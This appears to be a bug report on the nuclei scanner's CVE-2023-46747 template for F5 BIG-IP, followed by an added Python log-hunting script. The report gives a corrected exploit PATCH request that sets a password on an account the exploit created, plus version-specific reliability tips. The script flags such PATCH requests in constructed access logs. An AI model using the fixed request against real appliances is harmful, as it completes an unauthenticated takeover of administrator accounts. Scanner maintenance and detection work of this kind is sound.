Description
I've been investigating CVE-2023-46747 on various versions of BIG-IP and found that the nuclei template for this vulnerability has an invalid PATCH request that fails with a 401 response, disrupting all subsequent requests due to the use of the resultant invalid value of password2 and causing the exploit to fail. Through my own testing, I've figured out what a correct PATCH request looks like, and in the template it should be:
```http
PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
Content-Type: application/json;charset=UTF-8
Origin: https://{{Hostname}}
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://{{Hostname}}/tmui/tmui/login/expired_password/app/index.html

{"oldPassword":"{{hex_decode(password)}}","password": "{{password2}}"}
```
Note the addition of several headers and the inclusion of "oldPassword" in the JSON. I've confirmed that the updated template works against BIG-IP versions 16.1.2 and 17.1.0.3. Note that in version 16.1.2 (and earlier versions) accounts are created with an active password and the PATCH request is not necessary at all.
Also note that, at least in my testing, exploitation is a little unstable. It helps to build in time delays between sending some of the requests. Without any delays, exploitation tends to fail in version 16.1.3.1 in particular, even with the updated PATCH request template.
The original, incorrect PATCH template has been confirmed NOT to work in versions 15.1.8, 16.1.2, 16.1.3.1, and in 17.1.0.3.
Nuclei Version:
3.0.3
Template file:
http/cves/2023/CVE-2023-46747.yaml
Command to reproduce:
./nuclei -u https://192.168.92.138 -t cves/2023/CVE-2023-46747.yaml -v -debug
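From a defender's side, the request shape discussed in this issue (a PATCH to `/mgmt/tm/auth/user/<name>` carrying Basic auth and the expired-password page as Referer, with a 401 on a malformed attempt and a success on the corrected one) is something worth hunting for in access logs. The script below is an added example, not part of the issue or of the nuclei project; it parses constructed log lines in Apache combined format (the exact BIG-IP log layout is an assumption and may differ) and reports every PATCH against a user object, grouped by source and account so that a failed-then-successful sequence stands out. A legitimate expired-password change from a browser produces the same pattern, so the output is a triage list to correlate with account provenance, not a verdict on its own.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample log lines (Apache "combined" style, an assumed layout;
# these are made up for the example and do not come from a real device).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Nov/2023:10:00:01 +0000] "PATCH /mgmt/tm/auth/user/testuser HTTP/1.1" 401 123 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Nov/2023:10:00:07 +0000] "PATCH /mgmt/tm/auth/user/testuser HTTP/1.1" 200 456 "https://bigip.example/tmui/tmui/login/expired_password/app/index.html" "Mozilla/5.0"
198.51.100.7 - - [01/Nov/2023:10:05:00 +0000] "GET /mgmt/tm/sys/version HTTP/1.1" 200 789 "-" "curl/8.0"
203.0.113.5 - - [01/Nov/2023:10:06:30 +0000] "PATCH /mgmt/tm/auth/user/admin HTTP/1.1" 200 311 "https://bigip.example/tmui/tmui/login/expired_password/app/index.html" "Mozilla/5.0"
"""

# One combined-format line: source, timestamp, request line, status, size, referer, UA.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The user-object path from the issue: /mgmt/tm/auth/user/<name>
USER_PATH_RE = re.compile(r'^/mgmt/tm/auth/user/(?P<user>[^/?]+)$')
EXPIRED_PW_REFERER = '/tmui/tmui/login/expired_password/'


@dataclass
class Finding:
    src: str
    ts: str
    user: str
    status: int
    via_expired_password_page: bool


def find_user_patches(log_text):
    """Return every PATCH to a user object, in log order, as Finding records."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m['method'] != 'PATCH':
            continue
        um = USER_PATH_RE.match(m['path'])
        if not um:
            continue
        findings.append(Finding(
            src=m['src'],
            ts=m['ts'],
            user=um['user'],
            status=int(m['status']),
            via_expired_password_page=EXPIRED_PW_REFERER in m['referer'],
        ))
    return findings


def group_by_source_and_user(findings):
    """Map (source, user) -> ordered list of HTTP statuses seen for that pair.

    A 401 followed by a 2xx for the same pair is the 'retry until the password
    change sticks' shape described in the issue; a lone 2xx from an unfamiliar
    source is also worth a look.
    """
    seq = defaultdict(list)
    for f in findings:
        seq[(f.src, f.user)].append(f.status)
    return dict(seq)


def flag_pairs(findings):
    """Return (source, user) pairs whose PATCH sequence ends in success."""
    return sorted(
        pair for pair, statuses in group_by_source_and_user(findings).items()
        if 200 <= statuses[-1] < 300
    )


if __name__ == '__main__':
    hits = find_user_patches(SAMPLE_LOG)
    for f in hits:
        print(f'{f.ts} {f.src} PATCH user={f.user} status={f.status} '
              f'expired_password_referer={f.via_expired_password_page}')
    print('pairs to review:', flag_pairs(hits))
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; the first thing to check for each flagged pair is whether the account was provisioned through a known change, since the issue notes that on 16.1.2 and earlier the exploit does not even need the PATCH step, so account creation itself is the more robust signal there.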